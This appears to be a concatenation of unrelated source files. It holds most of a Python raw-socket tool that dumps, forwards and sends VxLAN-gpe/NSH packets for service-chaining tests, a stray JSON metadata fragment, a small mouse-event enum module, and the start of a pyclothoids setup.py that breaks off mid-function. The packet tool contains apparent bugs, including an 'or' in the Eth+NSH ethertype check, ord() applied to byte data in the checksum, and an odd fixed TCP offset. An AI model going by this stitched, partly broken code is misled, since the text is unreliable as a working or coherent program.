self.reserved = reserved
self.next_protocol = next_protocol
self.vni = vni
self.reserved2 = reserved2
header_size = 8
def build(self):
return struct.pack('!B H B I',
self.flags,
self.reserved,
self.next_protocol,
(self.vni << 8) + self.reserved2)
class ETHHEADER(Structure):
_fields_ = [('dmac0', c_ubyte),
('dmac1', c_ubyte),
('dmac2', c_ubyte),
('dmac3', c_ubyte),
('dmac4', c_ubyte),
('dmac5', c_ubyte),
('smac0', c_ubyte),
('smac1', c_ubyte),
('smac2', c_ubyte),
('smac3', c_ubyte),
('smac4', c_ubyte),
('smac5', c_ubyte),
('ethertype0', c_ubyte),
('ethertype1', c_ubyte)]
header_size = 14
def build(self):
return struct.pack('!B B B B B B B B B B B B B B',
self.dmac0,
self.dmac1,
self.dmac2,
self.dmac3,
self.dmac4,
self.dmac5,
self.smac0,
self.smac1,
self.smac2,
self.smac3,
self.smac4,
self.smac5,
self.ethertype0,
self.ethertype1)
class BASEHEADER(Structure):
"""
Represent a NSH base header
"""
_fields_ = [('version', c_ushort, 2),
('flags', c_ushort, 8),
('length', c_ushort, 6),
('md_type', c_ubyte),
('next_protocol', c_ubyte),
('service_path', c_uint, 24),
('service_index', c_uint, 8)]
def __init__(self, service_path=1, service_index=255,
version=NSH_VERSION1, flags=NSH_FLAG_ZERO,
length=NSH_TYPE1_LEN, md_type=NSH_MD_TYPE1,
proto=NSH_NEXT_PROTO_ETH, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.version = version
self.flags = flags
self.length = length
self.md_type = md_type
self.next_protocol = proto
self.service_path = service_path
self.service_index = service_index
header_size = 8
def build(self):
return struct.pack(
'!H B B I',
(self.version << 14) + (self.flags << 6) + self.length,
self.md_type,
self.next_protocol,
(self.service_path << 8) + self.service_index)
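# Illustrative layout of the 8 bytes produced by build() above (a reading of
# this class, not a normative NSH reference): the first 16 bits pack version
# (2 bits), flags (8 bits) and length (6 bits); then md_type and next_protocol
# take one byte each; the final 32-bit word holds service_path (24 bits) and
# service_index (8 bits).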
class CONTEXTHEADER(Structure):
_fields_ = [('network_platform', c_uint),
('network_shared', c_uint),
('service_platform', c_uint),
('service_shared', c_uint)]
header_size = 16
def __init__(self, network_platform=0x00, network_shared=0x00,
service_platform=0x00, service_shared=0x00, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.network_platform = network_platform
self.network_shared = network_shared
self.service_platform = service_platform
self.service_shared = service_shared
def build(self):
return struct.pack('!I I I I',
self.network_platform,
self.network_shared,
self.service_platform,
self.service_shared)
class IP4HEADER(Structure):
_fields_ = [
('ip_ihl', c_ubyte),
('ip_ver', c_ubyte),
('ip_tos', c_ubyte),
('ip_tot_len', c_ushort),
('ip_id', c_ushort),
('ip_frag_offset', c_ushort),
('ip_ttl', c_ubyte),
('ip_proto', c_ubyte),
('ip_chksum', c_ushort),
('ip_saddr', c_uint),
('ip_daddr', c_uint)]
header_size = 20
def build(self):
ip_header_pack = struct.pack('!B B H H H B B H I I',
IPV4_IHL_VER,
self.ip_tos,
self.ip_tot_len,
self.ip_id,
self.ip_frag_offset,
self.ip_ttl,
self.ip_proto,
self.ip_chksum,
self.ip_saddr,
self.ip_daddr)
return ip_header_pack
def set_ip_checksum(self, checksum):
self.ip_chksum = checksum
class UDPHEADER(Structure):
"""
Represents a UDP header
"""
_fields_ = [
('udp_sport', c_ushort),
('udp_dport', c_ushort),
('udp_len', c_ushort),
('udp_sum', c_ushort)]
header_size = 8
def build(self):
udp_header_pack = struct.pack('!H H H H',
self.udp_sport,
self.udp_dport,
self.udp_len,
self.udp_sum)
return udp_header_pack
class PSEUDO_UDPHEADER(Structure):
""" Pseudoheader used in the UDP checksum."""
def __init__(self):
self.src_ip = 0
self.dest_ip = 0
self.zeroes = 0
self.protocol = 17
self.length = 0
def build(self):
""" Create a string from a pseudoheader """
p_udp_header_pack = struct.pack('!I I B B H',
self.src_ip,
self.dest_ip,
self.zeroes,
self.protocol,
self.length)
return p_udp_header_pack
class TCPHEADER(Structure):
"""
Represents a TCP header
"""
_fields_ = [
('tcp_sport', c_ushort),
('tcp_dport', c_ushort),
('tcp_len', c_ushort),
('tcp_sum', c_ushort)]
header_size = 8
def decode_eth(payload, offset, eth_header_values):
eth_header = payload[offset:(offset+14)]
_header_values = struct.unpack('!B B B B B B B B B B B B B B', eth_header)
eth_header_values.dmac0 = _header_values[0]
eth_header_values.dmac1 = _header_values[1]
eth_header_values.dmac2 = _header_values[2]
eth_header_values.dmac3 = _header_values[3]
eth_header_values.dmac4 = _header_values[4]
eth_header_values.dmac5 = _header_values[5]
eth_header_values.smac0 = _header_values[6]
eth_header_values.smac1 = _header_values[7]
eth_header_values.smac2 = _header_values[8]
eth_header_values.smac3 = _header_values[9]
eth_header_values.smac4 = _header_values[10]
eth_header_values.smac5 = _header_values[11]
eth_header_values.ethertype0 = _header_values[12]
eth_header_values.ethertype1 = _header_values[13]
def decode_ip(payload, ip_header_values):
ip_header = payload[14:34]
_header_values = struct.unpack('!B B H H H B B H I I', ip_header)
ip_header_values.ip_ihl = _header_values[0] & 0x0F
ip_header_values.ip_ver = _header_values[0] >> 4
ip_header_values.ip_tos = _header_values[1]
ip_header_values.ip_tot_len = _header_values[2]
ip_header_values.ip_id = _header_values[3]
ip_header_values.ip_frag_offset = _header_values[4]
ip_header_values.ip_ttl = _header_values[5]
ip_header_values.ip_proto = _header_values[6]
ip_header_values.ip_chksum = _header_values[7]
ip_header_values.ip_saddr = _header_values[8]
ip_header_values.ip_daddr = _header_values[9]
def decode_udp(payload, udp_header_values):
udp_header = payload[34:42]
_header_values = struct.unpack('!H H H H', udp_header)
udp_header_values.udp_sport = _header_values[0]
udp_header_values.udp_dport = _header_values[1]
udp_header_values.udp_len = _header_values[2]
udp_header_values.udp_sum = _header_values[3]
def decode_tcp(payload, offset, tcp_header_values):
tcp_header = payload[(108+offset):(116+offset)]
_header_values = struct.unpack('!H H H H', tcp_header)
tcp_header_values.tcp_sport = _header_values[0]
tcp_header_values.tcp_dport = _header_values[1]
tcp_header_values.tcp_len = _header_values[2]
tcp_header_values.tcp_sum = _header_values[3]
def decode_vxlan(payload, vxlan_header_values):
"""Decode the VXLAN header for a received packets"""
vxlan_header = payload[42:50]
_header_values = struct.unpack('!B H B I', vxlan_header)
vxlan_header_values.flags = _header_values[0]
vxlan_header_values.reserved = _header_values[1]
vxlan_header_values.next_protocol = _header_values[2]
vni_rsvd2 = _header_values[3]
vxlan_header_values.vni = vni_rsvd2 >> 8
vxlan_header_values.reserved2 = vni_rsvd2 & 0x000000FF
def decode_nsh_baseheader(payload, offset, nsh_base_header_values):
"""Decode the NSH base headers for a received packets"""
base_header = payload[offset:(offset+8)]
_header_values = struct.unpack('!H B B I', base_header)
start_idx = _header_values[0]
nsh_base_header_values.md_type = _header_values[1]
nsh_base_header_values.next_protocol = _header_values[2]
path_idx = _header_values[3]
nsh_base_header_values.version = start_idx >> 14
    nsh_base_header_values.flags = (start_idx >> 6) & 0xFF
    nsh_base_header_values.length = start_idx & 0x3F
nsh_base_header_values.service_path = path_idx >> 8
nsh_base_header_values.service_index = path_idx & 0x000000FF
def decode_nsh_contextheader(payload, offset, nsh_context_header_values):
"""Decode the NSH context headers for a received packet"""
context_header = payload[offset:(offset+16)]
_header_values = struct.unpack('!I I I I', context_header)
nsh_context_header_values.network_platform = _header_values[0]
nsh_context_header_values.network_shared = _header_values[1]
nsh_context_header_values.service_platform = _header_values[2]
nsh_context_header_values.service_shared = _header_values[3]
def compute_internet_checksum(data):
"""
Function for Internet checksum calculation. Works
for both IP and UDP.
"""
checksum = 0
n = len(data) % 2
# data padding
pad = bytearray('', encoding='UTF-8')
if n == 1:
pad = bytearray(b'\x00')
# for i in range(0, len(data + pad) - n, 2):
for i in range(0, len(data)-1, 2):
checksum += (ord(data[i]) << 8) + (ord(data[i + 1]))
if n == 1:
checksum += (ord(data[len(data)-1]) << 8) + (pad[0])
while checksum >> 16:
checksum = (checksum & 0xFFFF) + (checksum >> 16)
checksum = ~checksum & 0xffff
return checksum
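# Quick sanity check (a sketch): for the two-byte payload "\x00\x01" the 16-bit
# one's-complement sum is 0x0001, so compute_internet_checksum returns
# ~0x0001 & 0xffff == 0xFFFE.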
# Implements int.from_bytes(s, byteorder='big')
def int_from_bytes(s):
return sum(ord(c) << (i * 8) for i, c in enumerate(s[::-1]))
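# Quick sanity check (a sketch): int_from_bytes("\x0a\x00\x00\x01") yields
# 0x0A000001, the big-endian integer form of the IPv4 address 10.0.0.1.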
def build_ethernet_header_swap(myethheader):
""" Build Ethernet header """
newethheader = ETHHEADER()
newethheader.smac0 = myethheader.dmac0
newethheader.smac1 = myethheader.dmac1
newethheader.smac2 = myethheader.dmac2
newethheader.smac3 = myethheader.dmac3
newethheader.smac4 = myethheader.dmac4
newethheader.smac5 = myethheader.dmac5
newethheader.dmac0 = myethheader.smac0
newethheader.dmac1 = myethheader.smac1
newethheader.dmac2 = myethheader.smac2
newethheader.dmac3 = myethheader.smac3
newethheader.dmac4 = myethheader.smac4
newethheader.dmac5 = myethheader.smac5
newethheader.ethertype0 = myethheader.ethertype0
newethheader.ethertype1 = myethheader.ethertype1
return newethheader
def build_ipv4_header(ip_tot_len, proto, src_ip, dest_ip, swap_ip):
"""
Builds a complete IP header including checksum
"""
if src_ip:
ip_saddr = socket.inet_aton(src_ip)
else:
ip_saddr = socket.inet_aton(socket.gethostbyname(socket.gethostname()))
if (swap_ip):
new_ip_daddr = int_from_bytes(ip_saddr)
new_ip_saddr = socket.inet_aton(dest_ip)
new_ip_saddr = int_from_bytes(new_ip_saddr)
else:
new_ip_saddr = int_from_bytes(ip_saddr)
new_ip_daddr = int_from_bytes(socket.inet_aton(dest_ip))
ip_header = IP4HEADER(IP_HEADER_LEN, IPV4_VERSION,
IPV4_TOS, ip_tot_len,
IPV4_PACKET_ID, 0, IPV4_TTL,
proto, 0, new_ip_saddr, new_ip_daddr)
checksum = compute_internet_checksum(ip_header.build())
ip_header.set_ip_checksum(checksum)
ip_header_pack = ip_header.build()
return ip_header, ip_header_pack
def build_udp_header(src_port, dest_port, ip_header, data):
"""
Building an UDP header requires fields from
IP header in order to perform checksum calculation
"""
# build UDP header with sum = 0
udp_header = UDPHEADER(src_port,
dest_port,
UDP_HEADER_LEN_BYTES + len(data), 0)
udp_header_pack = udp_header.build()
# build Pseudo Header
p_header = PSEUDO_UDPHEADER()
p_header.dest_ip = ip_header.ip_daddr
p_header.src_ip = ip_header.ip_saddr
p_header.length = udp_header.udp_len
p_header_pack = p_header.build()
udp_checksum = compute_internet_checksum(
p_header_pack + udp_header_pack + data)
udp_header.udp_sum = udp_checksum
# pack UDP header again but this time with checksum
udp_header_pack = udp_header.build()
return udp_header, udp_header_pack
def build_udp_packet(src_ip, dest_ip, src_port, dest_port, data, swap_ip):
"""
    Data needs to be encoded as Python bytes. In the case of strings
    this means a bytearray of a UTF-8 encoding.
"""
total_len = len(data) + IPV4_HEADER_LEN_BYTES + UDP_HEADER_LEN_BYTES
# First we build the IP header
ip_header, ip_header_pack = build_ipv4_header(total_len,
socket.IPPROTO_UDP,
src_ip, dest_ip, swap_ip)
# Build UDP header
udp_header, udp_header_pack = build_udp_header(src_port,
dest_port,
ip_header,
data)
udp_packet = ip_header_pack + udp_header_pack + data
return udp_packet
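# Illustrative call (hypothetical addresses and ports, shown as a comment so no
# packet is built at import time):
# pkt = build_udp_packet("10.0.0.1", "10.0.0.2", 4790, 4790,
#                        "hello".encode("utf-8"), False)
# The result is the raw IP header + UDP header + payload, ready to be prefixed
# with an Ethernet header and written to a raw socket.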
def getmac(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = None
return mac
def print_ethheader(ethheader):
print(
"Eth Dst MAC: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x, "
"Src MAC: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x, Ethertype: 0x%.4x" % (
ethheader.dmac0, ethheader.dmac1, ethheader.dmac2, ethheader.dmac3,
ethheader.dmac4, ethheader.dmac5, ethheader.smac0, ethheader.smac1,
ethheader.smac2, ethheader.smac3, ethheader.smac4, ethheader.smac5,
(ethheader.ethertype0 << 8) | ethheader.ethertype1))
def print_ipheader(ipheader):
print(
"IP Version: %s IP Header Length: %s, "
"TTL: %s, Protocol: %s, Src IP: %s, Dst IP: %s" % (
ipheader.ip_ver, ipheader.ip_ihl, ipheader.ip_ttl,
ipheader.ip_proto,
str(socket.inet_ntoa(struct.pack('!I', ipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack('!I', ipheader.ip_daddr)))))
def print_udpheader(udpheader):
print ("UDP Src Port: %s, Dst Port: %s, Length: %s, Checksum: %s" % (
udpheader.udp_sport, udpheader.udp_dport,
udpheader.udp_len, udpheader.udp_sum))
def print_vxlanheader(vxlanheader):
print("VxLAN/VxLAN-gpe VNI: %s, flags: %.2x, Next: %s" % (
vxlanheader.vni, vxlanheader.flags, vxlanheader.next_protocol))
def print_nsh_baseheader(nshbaseheader):
print("NSH base nsp: %s, nsi: %s" % (
nshbaseheader.service_path, nshbaseheader.service_index))
def print_nsh_contextheader(nshcontextheader):
print("NSH context c1: 0x%.8x, c2: 0x%.8x, c3: 0x%.8x, c4: 0x%.8x" % (
nshcontextheader.network_platform, nshcontextheader.network_shared,
nshcontextheader.service_platform, nshcontextheader.service_shared))
def main():
module_desc = '''
    This is a VxLAN/VxLAN-gpe + NSH dump and forward tool. You can use it to
    dump and forward VxLAN/VxLAN-gpe + NSH packets. It can also act as an
    NSH-aware SF for SFC tests when you use the --forward option; in that
    case, it will automatically decrease the NSI by one.
'''
parser = argparse.ArgumentParser(
description=module_desc, prog='vxlan_tool.py')
parser.add_argument(
'-i', '--interface',
help='Specify the interface to listen')
parser.add_argument(
'-d', '--do', choices=['dump', 'forward', 'send'],
        help='dump/forward/send VxLAN/VxLAN-gpe + NSH or Eth + NSH packet')
parser.add_argument(
'-t', '--type', choices=['eth_nsh', 'vxlan_gpe_nsh'],
default='vxlan_gpe_nsh',
help='Specify packet type for send: eth_nsh or vxlan_gpe_nsh')
parser.add_argument(
'--outer-source-mac',
help='Specify outer source MAC for packet send')
parser.add_argument(
'--outer-destination-mac',
help='Specify outer destination MAC for packet send')
parser.add_argument(
'--outer-source-ip',
help='Specify outer source IP address for packet send')
parser.add_argument(
'--outer-destination-ip',
help='Specify outer destination IP address for packet send')
parser.add_argument(
'--outer-source-udp-port', type=int,
help='Specify outer source UDP port for packet send')
parser.add_argument(
'--inner-source-mac',
help='Specify inner source MAC for packet send')
parser.add_argument(
'--inner-destination-mac',
help='Specify inner destination MAC for packet send')
parser.add_argument(
'--inner-source-ip',
help='Specify inner source IP address for packet send')
parser.add_argument(
'--inner-destination-ip',
help='Specify inner destination IP address for packet send')
parser.add_argument(
'--inner-source-udp-port', type=int,
help='Specify inner source UDP port for packet send')
parser.add_argument(
'--inner-destination-udp-port', type=int,
help='Specify inner destination UDP port for packet send')
parser.add_argument(
'-n', '--number', type=int,
help='Specify number of packet to send')
parser.add_argument(
'--no-swap-ip', dest='swap_ip', default=True, action='store_false',
help="won't swap ip if provided")
parser.add_argument(
'-v', '--verbose', choices=['on', 'off'],
help='dump packets when in forward mode')
parser.add_argument(
'--forward-inner', '-f', dest='forward_inner',
default=False, action='store_true',
help='Strip the outer encapsulation and forward the inner packet')
parser.add_argument(
'--block', '-b', type=int, default=0,
help=('Acts as a firewall dropping packets '
'that match this TCP dst port'))
args = parser.parse_args()
macaddr = None
try:
s = socket.socket(
socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
if args.interface is not None:
s.bind((args.interface, 0))
if ((args.do == "forward") or (args.do == "send")):
if args.interface is None:
print("Error: you must specify the interface by "
"-i or --interface for forward and send")
sys.exit(-1)
send_s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
send_s.bind((args.interface, 0))
if args.interface is not None:
macstring = getmac(args.interface)
if (macstring is not None):
macaddr = macstring.split(':')
if (args.do == "send"):
if (args.inner_source_mac is None):
args.inner_source_mac = macstring
if (args.inner_destination_mac is None):
print("Error: you must specify inner "
"destination MAC for packet send")
sys.exit(-1)
if ((args.inner_source_ip is None) or
(args.inner_destination_ip is None)):
print("Error: you must specify inner source IP "
"and inner destination IP for packet send")
sys.exit(-1)
if (args.outer_source_mac is None):
args.outer_source_mac = args.inner_source_mac
if (args.outer_destination_mac is None):
args.outer_destination_mac = args.inner_destination_mac
if (args.outer_source_ip is None):
args.outer_source_ip = args.inner_source_ip
if (args.outer_destination_ip is None):
args.outer_destination_ip = args.inner_destination_ip
if (args.outer_source_udp_port is None):
args.outer_source_udp_port = 55651
if (args.inner_source_udp_port is None):
args.inner_source_udp_port = args.outer_source_udp_port
if (args.inner_destination_udp_port is None):
args.inner_destination_udp_port = 25
if (args.number is None):
args.number = 10
except OSError as e:
print("{}".format(e) + " '%s'" % args.interface)
sys.exit(-1)
do_print = ((args.do != "forward") or (args.verbose == "on"))
vxlan_gpe_udp_ports = [4790, 6633]
vxlan_udp_ports = [4789] + vxlan_gpe_udp_ports
# header len
eth_length = 14
ip_length = 20
udp_length = 8
vxlan_length = 8
nshbase_length = 8
nshcontext_length = 16
""" Send VxLAN/VxLAN-gpe + NSH packet """
if (args.do == "send"):
myethheader = ETHHEADER()
myipheader = IP4HEADER()
myudpheader = UDPHEADER()
myvxlanheader = VXLAN()
mynshbaseheader = BASEHEADER()
mynshcontextheader = CONTEXTHEADER()
""" Set Ethernet header """
dstmacaddr = args.outer_destination_mac.split(":")
myethheader.dmac0 = int(dstmacaddr[0], 16)
myethheader.dmac1 = int(dstmacaddr[1], 16)
myethheader.dmac2 = int(dstmacaddr[2], 16)
myethheader.dmac3 = int(dstmacaddr[3], 16)
myethheader.dmac4 = int(dstmacaddr[4], 16)
myethheader.dmac5 = int(dstmacaddr[5], 16)
myethheader.smac0 = int(macaddr[0], 16)
myethheader.smac1 = int(macaddr[1], 16)
myethheader.smac2 = int(macaddr[2], 16)
myethheader.smac3 = int(macaddr[3], 16)
myethheader.smac4 = int(macaddr[4], 16)
myethheader.smac5 = int(macaddr[5], 16)
myethheader.ethertype0 = 0x08
myethheader.ethertype1 = 0x00
""" Set VxLAN header """
myvxlanheader.flags = 0
myvxlanheader.reserved = 0
myvxlanheader.next_protocol = 0x04
myvxlanheader.vni = 0x1234
myvxlanheader.reserved2 = 0
""" Set NSH base header """
mynshbaseheader.flags = NSH_FLAG_ZERO
mynshbaseheader.length = NSH_TYPE1_LEN
mynshbaseheader.md_type = NSH_MD_TYPE1
mynshbaseheader.next_protocol = NSH_NEXT_PROTO_ETH
mynshbaseheader.service_path = 23
mynshbaseheader.service_index = 45
""" Set NSH context header """
mynshcontextheader.network_platform = int_from_bytes(
socket.inet_aton(args.outer_destination_ip))
mynshcontextheader.network_shared = 0x1234
mynshcontextheader.service_platform = 0x12345678
mynshcontextheader.service_shared = 0x87654321
innerippack = build_udp_packet(
args.inner_source_ip, args.inner_destination_ip,
args.inner_source_udp_port, args.inner_destination_udp_port,
"Hellow, World!!!".encode('utf-8'), False)
if (args.type == "vxlan_gpe_nsh"):
outerippack = build_udp_packet(
args.outer_source_ip, args.outer_destination_ip,
args.outer_source_udp_port, 4790,
(myvxlanheader.build() + mynshbaseheader.build() +
mynshcontextheader.build() + myethheader.build() +
innerippack),
False)
elif (args.type == "eth_nsh"):
outerippack = (
mynshbaseheader.build() + mynshcontextheader.build() +
myethheader.build() + innerippack)
myethheader.ethertype0 = 0x89
myethheader.ethertype1 = 0x4f
""" Build Ethernet packet """
ethpkt = myethheader.build() + outerippack
""" Decode ethernet header """
decode_eth(ethpkt, 0, myethheader)
if (args.type == "eth_nsh"):
offset = eth_length
decode_nsh_baseheader(ethpkt, offset, mynshbaseheader)
decode_nsh_contextheader(
ethpkt, offset + nshbase_length, mynshcontextheader)
elif (args.type == "vxlan_gpe_nsh"):
""" Decode IP header """
decode_ip(ethpkt, myipheader)
""" Decode UDP header """
decode_udp(ethpkt, myudpheader)
offset = eth_length + ip_length + udp_length + vxlan_length
decode_nsh_baseheader(ethpkt, offset, mynshbaseheader)
decode_nsh_contextheader(
ethpkt, offset + nshbase_length, mynshcontextheader)
pktnum = 0
while (args.number > 0):
""" Send it and make sure all the data is sent out """
pkt = ethpkt
while pkt:
sent = send_s.send(pkt)
pkt = pkt[sent:]
pktnum += 1
if (do_print):
print("\n\nPacket #%d" % pktnum)
""" Print ethernet header """
if (do_print):
print_ethheader(myethheader)
if (args.type == "vxlan_gpe_nsh"):
""" Print IP header """
if (do_print):
print_ipheader(myipheader)
""" Print UDP header """
if (do_print):
print_udpheader(myudpheader)
""" Print VxLAN/VxLAN-gpe header """
if (do_print):
print_vxlanheader(myvxlanheader)
""" Print NSH base header """
if (do_print):
print_nsh_baseheader(mynshbaseheader)
""" Print NSH context header """
if (do_print):
print_nsh_contextheader(mynshcontextheader)
args.number -= 1
sys.exit(0)
# receive a packet
pktnum = 0
while True:
packet = s.recvfrom(65565)
# packet string from tuple
packet = packet[0]
myethheader = ETHHEADER()
myinsertedethheader = ETHHEADER()
has_inserted_eth = False
""" Decode ethernet header """
decode_eth(packet, 0, myethheader)
if ((myethheader.ethertype0 != 0x08) or
(myethheader.ethertype1 != 0x00)):
if ((myethheader.ethertype0 != 0x89) or
(myethheader.ethertype1 != 0x4f)):
continue
if (macaddr is not None):
if ((myethheader.dmac4 != int(macaddr[4], 16)) or
(myethheader.dmac5 != int(macaddr[5], 16))):
continue
""" Check if the received packet was ETH + NSH """
if ((myethheader.ethertype0 == 0x89) or
(myethheader.ethertype1 == 0x4f)):
pktnum = pktnum + 1
print("\n\nPacket #%d" % pktnum)
""" Eth + NSH """
mynshbaseheader = BASEHEADER()
mynshcontextheader = CONTEXTHEADER()
offset = eth_length
decode_nsh_baseheader(packet, offset, mynshbaseheader)
decode_nsh_contextheader(
packet, offset + nshbase_length, mynshcontextheader)
""" Print ethernet header """
print_ethheader(myethheader)
""" Print NSH base header """
print_nsh_baseheader(mynshbaseheader)
""" Print NSH context header """
print_nsh_contextheader(mynshcontextheader)
"""
Check if Firewall checking is enabled,
and block/drop if its the same TCP port
"""
if (args.block != 0):
mytcpheader = TCPHEADER()
decode_tcp(packet, 0, mytcpheader)
if (mytcpheader.tcp_dport == args.block):
print(
bcolors.WARNING + "TCP packet dropped on port: " +
str(args.block) + bcolors.ENDC)
continue
if ((args.do == "forward") and (args.interface is not None)):
""" nsi minus one for send """
mynshbaseheader.service_index -= 1
""" Build Ethernet header """
newethheader = build_ethernet_header_swap(myethheader)
""" Build Ethernet packet """
pkt = (newethheader.build() + mynshbaseheader.build() +
mynshcontextheader.build() +
packet[eth_length+nshbase_length+nshcontext_length:])
""" Send it and make sure all the data is sent out """
while pkt:
sent = send_s.send(pkt)
pkt = pkt[sent:]
continue
pktnum = pktnum + 1
if (do_print):
print("\n\nPacket #%d" % pktnum)
""" Print ethernet header """
if (do_print):
print_ethheader(myethheader)
myipheader = IP4HEADER()
""" Decode IP header """
decode_ip(packet, myipheader)
""" Print IP header """
if (do_print):
print_ipheader(myipheader)
if (myipheader.ip_proto != 17):
continue
myudpheader = UDPHEADER()
""" Decode UDP header """
decode_udp(packet, myudpheader)
""" Print UDP header """
if (do_print):
print_udpheader(myudpheader)
if (myudpheader.udp_dport not in vxlan_udp_ports):
continue
myvxlanheader = VXLAN()
""" Decode VxLAN/VxLAN-gpe header """
decode_vxlan(packet, myvxlanheader)
""" Print VxLAN/VxLAN-gpe header """
if (do_print):
print_vxlanheader(myvxlanheader)
mynshbaseheader = BASEHEADER()
mynshcontextheader = CONTEXTHEADER()
""" Print NSH header """
if (myudpheader.udp_dport in vxlan_gpe_udp_ports):
offset = eth_length + ip_length + udp_length + vxlan_length
""" Decode inserted ethernet header before NSH """
decode_eth(packet, offset, myinsertedethheader)
if ((myinsertedethheader.ethertype0 == 0x89) and
(myinsertedethheader.ethertype1 == 0x4f)):
has_inserted_eth = True
offset += eth_length
decode_nsh_baseheader(packet, offset, mynshbaseheader)
offset += nshbase_length
decode_nsh_contextheader(packet, offset, mynshcontextheader)
offset += nshcontext_length
""" Print NSH base header """
if (do_print):
print_nsh_baseheader(mynshbaseheader)
""" Print NSH context header """
if (do_print):
print_nsh_contextheader(mynshcontextheader)
"""
Check if Firewall checking is enabled,
and block/drop if its the same TCP port
"""
if (args.block != 0):
mytcpheader = TCPHEADER()
decode_tcp(packet, eth_length, mytcpheader)
if (mytcpheader.tcp_dport == args.block):
print(
bcolors.WARNING + "TCP packet dropped on port: " +
str(args.block) + bcolors.ENDC)
continue
if ((args.do == "forward") and
(args.interface is not None) and
(mynshbaseheader.service_index > 1)):
""" Build Ethernet header """
newethheader = build_ethernet_header_swap(myethheader)
"""
Build the packet, either encapsulated,
or the original inner packet
"""
pkt = None
if args.forward_inner:
""" Just build the original, inner packet """
inner_offset = (eth_length + ip_length + udp_length +
vxlan_length + nshbase_length +
nshcontext_length)
inner_ethheader = ETHHEADER()
# Get the inner ethernet header
                decode_eth(packet[inner_offset:], 0, inner_ethheader)
# The new SourceMac should be the outer dest,
# and the new DestMac should be the inner dest
# This call sets the new SourceMac to be the outer dest
newethheader = build_ethernet_header_swap(myethheader)
# Now set the DestMac to be the inner dest
newethheader.dmac0 = inner_ethheader.dmac0
newethheader.dmac1 = inner_ethheader.dmac1
newethheader.dmac2 = inner_ethheader.dmac2
newethheader.dmac3 = inner_ethheader.dmac3
newethheader.dmac4 = inner_ethheader.dmac4
newethheader.dmac5 = inner_ethheader.dmac5
pkt = (newethheader.build() +
packet[inner_offset + eth_length:])
else:
""" Build IP packet"""
if (myudpheader.udp_dport in vxlan_gpe_udp_ports):
""" nsi minus one """
mynshbaseheader.service_index -= 1
if (has_inserted_eth is True):
ippack = build_udp_packet(
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_daddr))),
myudpheader.udp_sport,
myudpheader.udp_dport,
(myvxlanheader.build() +
myinsertedethheader.build() +
mynshbaseheader.build() +
mynshcontextheader.build() +
packet[offset:]),
args.swap_ip)
else:
ippack = build_udp_packet(
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_daddr))),
myudpheader.udp_sport,
myudpheader.udp_dport,
(myvxlanheader.build() +
mynshbaseheader.build() +
mynshcontextheader.build() +
packet[offset:]),
args.swap_ip)
else:
ippack = build_udp_packet(
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_saddr))),
str(socket.inet_ntoa(struct.pack(
'!I', myipheader.ip_daddr))),
myudpheader.udp_sport,
myudpheader.udp_dport,
packet[eth_length+ip_length+udp_length:],
args.swap_ip)
""" Build Ethernet packet """
pkt = newethheader.build() + ippack
""" Send it and make sure all the data is sent out """
while pkt:
sent = send_s.send(pkt)
pkt = pkt[sent:]
if __name__ == "__main__":
main()
``` |
{
"source": "johSchm/cloudia",
"score": 3
} |
#### File: johSchm/cloudia/utils.py
```python
from enum import Enum
class MouseEvents(Enum):
RIGHT = 0
LEFT = 1
MIDDLE = 2
def mouse_click_identifier(event):
""" event also has x & y attributes
"""
if event.num == 1:
return MouseEvents.LEFT
elif event.num == 2:
return MouseEvents.RIGHT
else:
return MouseEvents.MIDDLE
``` |
{
"source": "johschmitz/pyclothoids",
"score": 2
} |
#### File: johschmitz/pyclothoids/setup.py
```python
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
import sys
import setuptools
from pathlib import Path
from os import listdir
from os.path import isfile, join, abspath, dirname
__version__ = '0.1.2'
class get_pybind_include(object):
"""Helper class to determine the pybind11 include path
The purpose of this class is to postpone importing pybind11
until it is actually installed, so that the ``get_include()``
method can be invoked. """
def __init__(self, user=False):
self.user = user
def __str__(self):
import pybind11
return pybind11.get_include(self.user)
extensions = [
Extension(
'pyclothoids._clothoids_cpp',
[join('pyclothoids' , *i) for i in (('src','main.cpp'),('src','Submodules','Clothoids','src','Fresnel.cc'),('src','Submodules','Clothoids','src','Clothoid.cc'),
('src','Submodules','Clothoids','src','G2lib.cc'),('src','Submodules','Clothoids','src','AABBtree.cc'),('src','Submodules','Clothoids','src','Biarc.cc'),('src','Submodules','Clothoids','src','BiarcList.cc'),
('src','Submodules','Clothoids','src','Circle.cc'),
('src','Submodules','Clothoids','src','ClothoidDistance.cc'),('src','Submodules','Clothoids','src','ClothoidG2.cc'),('src','Submodules','Clothoids','src','ClothoidList.cc'),
('src','Submodules','Clothoids','src','G2lib_intersect.cc'),('src','Submodules','Clothoids','src','Line.cc'),('src','Submodules','Clothoids','src','PolyLine.cc'),
('src','Submodules','Clothoids','src','Triangle2D.cc'),
('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-1-Quadratic.cc'),('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-2-Cubic.cc'),
('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-3-Quartic.cc'),('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-Jenkins-Traub.cc'),
('src','Submodules','Clothoids','submodules','quarticRootsFlocke','src','PolynomialRoots-Utils.cc'))],
include_dirs=[
# Path to pybind11 headers
get_pybind_include(),
get_pybind_include(user=True),
join('pyclothoids','src','Submodules','Clothoids','src'),
join('pyclothoids','src','Submodules','Clothoids','submodules','quarticRootsFlocke','src')
],
language='c++'
),
]
# As of Python 3.6, CCompiler has a `has_flag` method.
# cf http://bugs.python.org/issue26689
def has_flag(compiler, flagname):
"""Return a boolean indicating whether a flag name is supported on
the specified compiler.
"""
import tempfile
